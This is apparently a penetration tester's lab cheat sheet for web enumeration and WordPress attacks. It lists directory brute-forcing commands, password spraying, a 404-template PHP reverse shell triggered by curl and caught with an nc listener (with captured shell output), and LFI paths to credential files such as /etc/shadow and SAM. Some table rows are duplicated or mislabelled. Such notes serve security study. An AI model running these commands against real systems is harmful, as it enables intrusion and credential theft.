Uncategorized

NOTES_web_enumeration

DIRB

With Proxy (-P) and output (-o)

CommandDescription
dirb http://ipGeneric Search
dirb http://10.11.1.222 -P 10.11.1.222:8080 -o dirb_8080_10.11.1.222.txtUsing Proxy

GOBUSTER

With directory scan (dir) and subnet scan (vhost)

CommandDescription
gobuster dir -u http://10.11.1.222:8080 -w /usr/share/wordlists/dirb/big.txtDirectory
gobuster vhost -u http://crafty.htb -r -k -w /usr/share/seclists/Discovery/DNS/namelist.txt --append-domainVHOST

DIRBUSTER

Dirbuster is a GUI for directory enumeration

CommandDescription
dirbusterStart GII

WORDLISTS

CommandDescription
/opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txtDirectory/Page Wordlist
/opt/useful/SecLists/Discovery/Web-Content/web-extensions.txtExtensions Wordlist
/opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txtDomain Wordlist
/opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txtParameters Wordlist

CREATE WORDLISTS

CommandDescription
cewl -w searchWordlists.txt -d2 -m 3 search.htbCewl on a Website
crackmapexec smb search.htb search.htb -u searchWordlists.txt -p IsolationIsKey?Use a List
Axel is a command-line-based download accelerator for LinuxAxel

ENUMERATION

CommandDescription
whatweb 10.11.1.101Cewl on a Website
crackmapexec smb search.htb search.htb -u searchWordlists.txt -p IsolationIsKey?Use a List
Axel is a command-line-based download accelerator for LinuxAxel

GOOGLE BOTS

Place into your user agent

CommandDescription
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)Newer version
Googlebot/2.1 (+http://www.google.com/bot.html)Older version

WORDPRESS

Particular attacks to wordpress

CommandDescription
wpscan --url http://10.11.1.234 --passwords /usr/share/wordlists/rockyou.txt --usernames adminBrute Force
[!] Valid Combinations Found: Username: admin, Password: passwordGood Result
https://www.hackingarticles.in/wordpress-reverse-shell/Reference
CHANGE 404 PAGE - PANEL --> APEARANCE --> EDITORPath to Replace 404
curl http://10.11.1.234/wp-content/themes/twentytwelve/404.phpTrigger Reverse Shell
nc -nvlp 80Setup Listener
/usr/share/seclists/Web-Shells/WordPress/plugin-shell.phpCommon Reverse Shell

LFI / RFI

Local File Inclusion (LFI) / Remote File Inclusion (RFI)
The following list are common operating system files

CommandDescription
https://insecure-website.com/loadImage?filename=..\..\..\windows\win.iniExample
C:\windows\win.iniWindows
C:\windows\system.iniWindows
C:\windows\iis.logWindows
C:\windows\System32\Drivers\etc\hostsWindows
C:\Windows\system32\config\SYSTEMWindows
C:\windows\debug\netsetup.logWindows
C:\windows\debug\sammui.logWindows
C:\windows\debug\netlogon.logWindows
C:\windows\debug\passwd.logWindows
C:\windows\system32\winevt\logs\system.evtxWindows
C:\windows\system32\winevt\logs\Windows Powershell.evtxWindows
C:\windows\WindowsUpdate.logWindows
C:\windows\system32\calc.exeWindows
C:\windows\system32\windowspowershell\v1.0\powershell.exeWindows
C:\windows\ccm\logs\filesystemfile.logWindows
C:\users\administrator\appdata\local\recently-used.xbelWindows
C:\users\administrator\desktop\desktop.iniWindows
C:\windows\panther\unattended.xmlWindows
C:\windows\panther\unattended\unattended.xmlWindows
C:\windows\repair\samWindows
C:\windows\system32\tasks\dailyWindows
C:\windows\panther\sysprep.infWindows
/etc/passwdLinux
/etc/shadowLinux
/etc/crontabLinux

WORDPRESS CREATE REVERSE SHELL 404 PAGE

└─$ cp /usr/share/webshells/php/php-reverse-shell.php .

└─$ 
└─$                                                                 
listening on [any] 80 ...
connect to [192.168.119.188] from (UNKNOWN) [10.11.1.234] 42095
Linux core 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux
 00:42:17 up  4:23,  0 users,  load average: 0.02, 0.02, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
\$ 
OR
└─$ sudo apt install seclists
└─$ cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php .
UPLOAD, INSTALL, AND ACTIVATE

CURL -i, –include (HTTP FTP) Include response headers in the output. HTTP response headers can include things like server name, cookies, date of the document, HTTP version and more… With non-HTTP protocols, the “headers” are other server communication. curl -i ip curl -i http://ip curl -i http://url.com

BURPSUITE

BURPSUITE:
/etc/hosts ---> add found links to it (like DNS)
INTRUDER - create a payload for various inputs
REPEATER - change the request or reply
ALWAYS CHECK THE BOX FOR INTERCEPT RESPONSE
Scroll to top